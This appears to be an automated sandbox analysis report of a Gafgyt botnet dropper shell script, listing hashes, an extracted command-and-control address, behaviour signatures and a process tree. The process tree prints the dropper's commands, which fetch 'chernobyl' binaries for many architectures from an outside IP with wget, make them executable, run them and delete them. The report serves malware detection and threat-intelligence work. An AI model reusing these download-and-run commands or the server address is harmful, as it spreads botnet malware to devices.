Analysis
-
max time kernel
2s -
max time network
22s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-01-2025 03:17
Static task
static1
Behavioral task
behavioral1
Sample
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
-
Size
2KB
-
MD5
87a7140288b8fc77f9917199d1c969bb
-
SHA1
0931d942a8cc6f317b24082900bd24ec697a697e
-
SHA256
e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f
-
SHA512
2cdebd869d0cd7f590f050fe987af0ff80592646cdaaff83b7b78f07c8328401c87bd4b8d072dd87ef26de619a2ec7e06ad7e61204371e93e21a1835f23097f7
Malware Config
Extracted
gafgyt
195.179.230.64:606
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 811 chmod 826 chmod 853 chmod 739 chmod 773 chmod 783 chmod 798 chmod 842 chmod 848 chmod 752 chmod 758 chmod 763 chmod 768 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/chernobyl.mips 740 chernobyl.mips -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route chernobyl.mips -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route chernobyl.mips -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 723 wget 740 chernobyl.mips 743 rm 744 wget 754 chernobyl.mipsel 756 rm -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/chernobyl.sh4 wget File opened for modification /tmp/chernobyl.m68k wget File opened for modification /tmp/chernobyl.i686 wget File opened for modification /tmp/chernobyl.i586 wget File opened for modification /tmp/chernobyl.arm4 wget File opened for modification /tmp/chernobyl.arm6 wget File opened for modification /tmp/chernobyl.mips wget File opened for modification /tmp/chernobyl.mipsel wget File opened for modification /tmp/chernobyl.x86 wget File opened for modification /tmp/chernobyl.ppc wget File opened for modification /tmp/chernobyl.sparc wget File opened for modification /tmp/chernobyl.arm5 wget File opened for modification /tmp/chernobyl.arm7 wget
Processes
-
/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh1⤵PID:718
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:723
-
-
/bin/chmodchmod +x chernobyl.mips2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/chernobyl.mips./chernobyl.mips2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
- System Network Configuration Discovery
PID:740
-
-
/bin/rmrm -rf chernobyl.mips2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/chmodchmod +x chernobyl.mipsel2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/chernobyl.mipsel./chernobyl.mipsel2⤵
- System Network Configuration Discovery
PID:754
-
-
/bin/rmrm -rf chernobyl.mipsel2⤵
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.sh42⤵
- Writes file to tmp directory
PID:757
-
-
/bin/chmodchmod +x chernobyl.sh42⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/chernobyl.sh4./chernobyl.sh42⤵PID:759
-
-
/bin/rmrm -rf chernobyl.sh42⤵PID:761
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.x862⤵
- Writes file to tmp directory
PID:762
-
-
/bin/chmodchmod +x chernobyl.x862⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/chernobyl.x86./chernobyl.x862⤵PID:764
-
-
/bin/rmrm -rf chernobyl.x862⤵PID:766
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.m68k2⤵
- Writes file to tmp directory
PID:767
-
-
/bin/chmodchmod +x chernobyl.m68k2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/chernobyl.m68k./chernobyl.m68k2⤵PID:769
-
-
/bin/rmrm -rf chernobyl.m68k2⤵PID:771
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.i6862⤵
- Writes file to tmp directory
PID:772
-
-
/bin/chmodchmod +x chernobyl.i6862⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/chernobyl.i686./chernobyl.i6862⤵PID:774
-
-
/bin/rmrm -rf chernobyl.i6862⤵PID:776
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.ppc2⤵
- Writes file to tmp directory
PID:777
-
-
/bin/chmodchmod +x chernobyl.ppc2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/chernobyl.ppc./chernobyl.ppc2⤵PID:785
-
-
/bin/rmrm -rf chernobyl.ppc2⤵PID:787
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.i5862⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod +x chernobyl.i5862⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/chernobyl.i586./chernobyl.i5862⤵PID:799
-
-
/bin/rmrm -rf chernobyl.i5862⤵PID:802
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.sparc2⤵
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod +x chernobyl.sparc2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/chernobyl.sparc./chernobyl.sparc2⤵PID:812
-
-
/bin/rmrm -rf chernobyl.sparc2⤵PID:815
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm42⤵
- Writes file to tmp directory
PID:816
-
-
/bin/chmodchmod +x chernobyl.arm42⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/chernobyl.arm4./chernobyl.arm42⤵PID:827
-
-
/bin/rmrm -rf chernobyl.arm42⤵PID:831
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm52⤵
- Writes file to tmp directory
PID:833
-
-
/bin/chmodchmod +x chernobyl.arm52⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/chernobyl.arm5./chernobyl.arm52⤵PID:843
-
-
/bin/rmrm -rf chernobyl.arm52⤵PID:846
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm62⤵
- Writes file to tmp directory
PID:847
-
-
/bin/chmodchmod +x chernobyl.arm62⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/chernobyl.arm6./chernobyl.arm62⤵PID:849
-
-
/bin/rmrm -rf chernobyl.arm62⤵PID:851
-
-
/usr/bin/wgetwget http://195.179.230.64/chernobyl.arm72⤵
- Writes file to tmp directory
PID:852
-
-
/bin/chmodchmod +x chernobyl.arm72⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/chernobyl.arm7./chernobyl.arm72⤵PID:854
-
-
/bin/rmrm -rf chernobyl.arm72⤵PID:856
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
149KB
MD576cd360f074eaa5d8287bb0762aab991
SHA172da777df5b6d7794efa05d87e5528d0c45e1403
SHA256e6177852038d2130936a6c52ae274f813d5338f94b4f27faa6e19f7db19cbd46
SHA512897e406c0982fa347e945653a5af9db7876004ff0e54a9a2bb5cde10bb0df3b52172a54481726d974621291deaae0c29df90e2333eb81c6fe30f15e190cdfd38